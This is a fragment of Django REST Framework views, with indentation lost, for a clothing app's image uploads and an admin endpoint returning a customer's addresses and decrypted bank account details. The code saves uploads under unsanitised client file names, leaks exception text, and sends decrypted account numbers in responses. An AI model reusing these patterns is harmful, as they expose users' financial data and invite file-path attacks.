except Exception as e:
print(traceback.format_exc())
return Response({"message" : str(e), "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
#######################################################
# api to add pattern colour images t-shirts
#######################################################
@api_view(['POST'])
def Add_Pattern_Colour_Tshirt(request):
try:
with transaction.atomic():
API_Key = request.META.get('HTTP_AUTHORIZATION')
if API_Key is not None:
try:
token = Token.objects.get(key=API_Key)
user = token.user
print(user)
checkGroup = user.groups.filter(name='Admin').exists()
print(checkGroup)
except Exception as e1:
return Response({"message" : "Session Expired!! Please Login Again", "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
if checkGroup:
file = request.FILES.get('image')
imageUrl = ""
if file is not None:
fs = FileSystemStorage()
filename = fs.save("patterncolourTshirtimages/"+str(user.id)+"/"+file.name, file)
uploaded_file_url = fs.url(filename)
shp = ClothStylePatternColourImage.objects.create(colour_id = request.data['colour'],
cloth_style_id = request.data['cloth_style'],
pattern_id = request.data['pattern'],
image = uploaded_file_url)
return Response({ 'message': addSuccessMessage, "status":"1"}, status=status.HTTP_200_OK)
else:
return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
else:
return Response({'status': "0", 'message': 'Timezone is missing!'}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
except Exception as e:
print(traceback.format_exc())
return Response({"message" : str(e), "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
#######################################################
# api update fabric
#######################################################
@api_view(['POST'])
def Update_Fabric(request):
try:
with transaction.atomic():
API_Key = request.META.get('HTTP_AUTHORIZATION')
if API_Key is not None:
try:
token = Token.objects.get(key=API_Key)
user = token.user
print(user)
checkGroup = user.groups.filter(name='Admin').exists()
print(checkGroup)
fabricId = request.data['fabric_id']
except Exception as e1:
return Response({"message" : "Session Expired!! Please Login Again", "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
if checkGroup:
file = request.FILES.get('image')
imageUrl = ""
if file is not None:
fs = FileSystemStorage()
filename = fs.save("fabricimages/"+str(user.id)+"/"+file.name, file)
uploaded_file_url = fs.url(filename)
shp = Fabric.objects.filter(id=fabricId).update(image = uploaded_file_url)
return Response({ 'message': addSuccessMessage, "status":"1"}, status=status.HTTP_200_OK)
else:
return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
else:
return Response({'status': "0", 'message': 'Timezone is missing!'}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
except Exception as e:
print(traceback.format_exc())
return Response({"message" : str(e), "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
########################################################################
# update add_fabric_colour
########################################################################
############################################################
# Show Profile
############################################################
@api_view(['POST'])
def Show_user_info(request):
try:
with transaction.atomic():
try:
api_key = request.META.get('HTTP_AUTHORIZATION')
token1 = Token.objects.get(key=api_key)
user = token1.user
orderId = request.data.get('orderId')
check_group = user.groups.filter(name='Admin').exists()
if check_group == False:
return Response({"message" : errorMessageUnauthorised, "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
except:
print(traceback.format_exc())
return Response({"message" : errorMessageUnauthorised, "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
order1 = OrderPost.objects.filter(id = orderId)
if order1:
order1serializer = OrderPostSerializer(order1,many=True)
order_data = order1serializer.data
for data in order_data:
try:
userr = User.objects.get(id=data['user'])
except:
userr=None
if userr is not None:
user_detail = UserSerializer(userr)
userserializer = user_detail.data
userserializer['user_name'] = userserializer['user_name'][:30]
userserializer['fullname'] = userserializer['fullname'][:30]
userserializer['email'] = userserializer['email'][:30]
####################user bank detail
try:
userr_bank = BankDetail.objects.get(user_id=data['user'])
except:
userr_bank=None
userbankdetail = []
if userr_bank is not None:
user_bank = BankDetailSerializer(userr_bank)
userbankdetail = user_bank.data
userbankdetail['Account_name'] = bytes(userbankdetail['Account_name'],'utf-8')
userbankdetail['Account_name'] = cipher_suite.decrypt(userbankdetail['Account_name'])
userbankdetail['Type'] = bytes(userbankdetail['Type'],'utf-8')
userbankdetail['Type'] = cipher_suite.decrypt(userbankdetail['Type'])
userbankdetail['routing_number'] = bytes(userbankdetail['routing_number'],'utf-8')
userbankdetail['routing_number'] = cipher_suite.decrypt(userbankdetail['routing_number'])
userbankdetail['acc_number'] = bytes(userbankdetail['acc_number'],'utf-8')
userbankdetail['acc_number'] = cipher_suite.decrypt(userbankdetail['acc_number'])
######################user address
try:
user_secondry_address = Addresses.objects.filter(user_id = data['user'])
except:
user_secondry_address = None
useraddresses = []
if user_secondry_address is not None:
user_addresses = AddressesSerializer(user_secondry_address, many=True)
useraddresses = user_addresses.data
######################user address primary
try:
user_primary_address = OrderTrn.objects.get(id = data['order'])
address_id = user_primary_address.address_id
print(address_id)
except:
user_primary_address = None
if user_primary_address is not None:
try:
primary_address = Addresses.objects.get(id = address_id)
except:
primary_address = None
userprimaryaddress = []
if primary_address is not None:
user_add_pri = AddressesSerializer(primary_address)
userprimaryaddress = user_add_pri.data
return Response({"message" : addSuccessMessage, "status" : "1", "userr": userserializer,"user_bank":userbankdetail,"addresses":useraddresses,"primary":userprimaryaddress}, status=status.HTTP_201_CREATED)
else:
return Response({"message" : "Order Not Found", "status" : "1"}, status=status.HTTP_201_CREATED)
except Exception:
print(traceback.format_exc())
return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.